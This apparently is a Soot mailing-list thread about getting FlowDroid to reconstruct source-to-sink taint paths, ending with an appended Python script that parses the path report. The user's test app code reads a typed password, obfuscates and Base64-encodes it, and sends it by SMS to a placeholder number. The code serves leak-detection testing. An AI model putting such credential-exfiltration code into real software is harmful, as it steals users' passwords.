[Soot-list] Re: print the path from source(s) to sink(s) found by flowdroid
XiaoYang
yangx92 at hotmail.com
Tue Dec 8 09:14:14 EST 2015
Hi Steven,
I appended “--pathalgo contextsensitive” to the command line. It showed more information than before. However, it lost some information.
For example, below is the Android application code snippet.
>>>
protected void onRestart(){
    super.onRestart();
    EditText usernameText =
        (EditText)findViewById(R.id.username);
    EditText passwordText =
        (EditText)findViewById(R.id.pwdString);
    String uname = usernameText.getText().toString();
    String pwd = passwordText.getText().toString();
    if(!uname.isEmpty() && !pwd.isEmpty())
        this.user = new User(uname, pwd);
}
//Callback method defined in xml file
public void sendMessage(View view) throws UnsupportedEncodingException{
    if(user == null) return;
    Password pwd = user.getpwd();
    String pwdString = pwd.getPassword();
    String obfPwd = "";
    //must track primitives
    for(char c : pwdString.toCharArray())
        obfPwd += c + "_";
    String message = "User: " +
        user.getName() + " | PWD: " + obfPwd;
    String message_base64 = Base64.encodeToString(message.getBytes(),Base64.DEFAULT);
    SmsManager sms = SmsManager.getDefault();
    sms.sendTextMessage("+86 12345678901",
        null, message_base64, null, null); //pwd_str+uname_str
}
>>>
I ran FlowDroid with the options “--pathalgo contextsensitive --implicit true -aplength 15”.
The following is the information given by FlowDroid.
>>>
The sink virtualinvoke $r9.<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>("+86 12345678901", null, $r5, null, null) on line 49 in method <com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)> was called with values from the following sources:
- - $r1 = virtualinvoke $r0.<com.example.leakpasswd.MainActivity: android.view.View findViewById(int)>(2131230724) on line 26 in method <com.example.leakpasswd.MainActivity: void onRestart()>
on Path:
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> $r1 = virtualinvoke $r0.<com.example.leakpasswd.MainActivity: android.view.View findViewById(int)>(2131230724)
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> $r3 = (android.widget.EditText) $r1
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> $r4 = virtualinvoke $r3.<android.widget.EditText: android.text.Editable getText()>()
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> $r6 = interfaceinvoke $r4.<android.text.Editable: java.lang.String toString()>()
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> $z0 = virtualinvoke $r6.<java.lang.String: boolean isEmpty()>()
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> if $z0 != 0 goto return
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> $r0.<com.example.leakpasswd.MainActivity: com.example.leakpasswd.User user> = $r7
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> return
-> <dummyMainClass: void dummyMainMethod(java.lang.String[])>
-> virtualinvoke $r1.<com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)>($r3)
-> <com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)>
-> $r2 = $r0.<com.example.leakpasswd.MainActivity: com.example.leakpasswd.User user>
-> <com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)>
-> if $r2 != null goto $r2 = $r0.<com.example.leakpasswd.MainActivity: com.example.leakpasswd.User user>
-> <com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)>
-> virtualinvoke $r9.<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>("+86 12345678901", null, $r5, null, null)
>>>
FlowDroid did not track the code below.
>>>
for(char c : pwdString.toCharArray())
    obfPwd += c + "_";
String message = "User: " +
    user.getName() + " | PWD: " + obfPwd;
String message_base64 = Base64.encodeToString(message.getBytes(),Base64.DEFAULT);
>>>
Is there a solution to handle this?
Great thanks!!
Young
From: Steven Arzt
Sent: December 7, 2015 16:33
To: 'XiaoYang';'soot-list at CS.McGill.CA'
Subject: Re: [Soot-list] print the path from source(s) to sink(s) found by flowdroid
Hi Xiao,
That’s possible. You need to enable a path reconstruction algorithm that supports path reconstruction. If you are using the FlowDroid command-line application, just append “--pathalgo contextsensitive” to your command line. It will increase the runtime, though.
Best regards,
Steven
From: soot-list-bounces at CS.McGill.CA [mailto:soot-list-bounces at CS.McGill.CA] On Behalf Of XiaoYang
Sent: Sunday, December 6, 2015 04:55
To: soot-list at CS.McGill.CA
Subject: [Soot-list] print the path from source(s) to sink(s) found by flowdroid
Hi all,
Suppose that I found an information leak in an Android application with FlowDroid. Could I print the path from source(s) to sink(s)?
Take an example. Below is the partial information given by FlowDroid.
>>[main] INFO soot.jimple.infoflow.Infoflow - The sink virtualinvoke $r10.<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>("+86 123456789", null, $r6, null, null) in method <com.example.leakpasswd.MainActivity: void onCreate(android.os.Bundle)> was called with values from the following sources:
>>[main] INFO soot.jimple.infoflow.Infoflow - - $r2 = virtualinvoke $r0.<com.example.leakpasswd.MainActivity: android.view.View findViewById(int)>(2131230722) in method <com.example.leakpasswd.MainActivity: void onCreate(android.os.Bundle)>
I want to get the path from findViewById to sendTextMessage. Is there a method to handle that?
Great thanks!!
Young
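
A small triage script for the report format quoted in this thread, as an added example that is not part of the original e-mails or of FlowDroid: it parses the "on Path:" listing and reports which calls expected between source and sink are absent from the reconstructed path. The sample report is constructed (shortened from the output above), and the function names `parse_path`, `callees` and `missing` are hypothetical.

```python
import re

# Constructed sample: shortened from the report format quoted in the thread.
REPORT = """The sink virtualinvoke $r9.<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>("+86 12345678901", null, $r5, null, null) on line 49 in method <com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)> was called with values from the following sources:
- - $r1 = virtualinvoke $r0.<com.example.leakpasswd.MainActivity: android.view.View findViewById(int)>(2131230724) on line 26 in method <com.example.leakpasswd.MainActivity: void onRestart()>
on Path:
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> $r1 = virtualinvoke $r0.<com.example.leakpasswd.MainActivity: android.view.View findViewById(int)>(2131230724)
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> $r4 = virtualinvoke $r3.<android.widget.EditText: android.text.Editable getText()>()
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> $r0.<com.example.leakpasswd.MainActivity: com.example.leakpasswd.User user> = $r7
-> <dummyMainClass: void dummyMainMethod(java.lang.String[])>
-> virtualinvoke $r1.<com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)>($r3)
-> <com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)>
-> $r2 = $r0.<com.example.leakpasswd.MainActivity: com.example.leakpasswd.User user>
-> <com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)>
-> virtualinvoke $r9.<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>("+86 12345678901", null, $r5, null, null)
"""

METHOD = re.compile(r"<[\w.$]+: \S+ [\w$<>]+\(.*\)>")   # a whole-line method signature
CALLEE = re.compile(r"<([\w.$]+): \S+ ([\w$<>]+)\(")    # an invoked method inside a statement

def parse_path(report):
    """Return [(enclosing_method, statement), ...] for the lines after 'on Path:'."""
    steps, method, in_path = [], None, False
    for line in report.splitlines():
        line = line.strip()
        if line == "on Path:":
            in_path = True
        elif in_path and line.startswith("-> "):
            item = line[3:]
            if METHOD.fullmatch(item):
                method = item      # context line: the method containing the next statement
            else:
                steps.append((method, item))
    return steps

def callees(steps):
    """Names of the methods invoked by the statements on the path, in order."""
    return [m.group(2) for _, stmt in steps for m in CALLEE.finditer(stmt)]

def missing(steps, expected):
    """Expected calls that do not appear on the reconstructed path."""
    return [name for name in expected if name not in set(callees(steps))]

if __name__ == "__main__":
    steps = parse_path(REPORT)
    print(callees(steps), missing(steps, ["toCharArray", "getBytes", "encodeToString"]))
```
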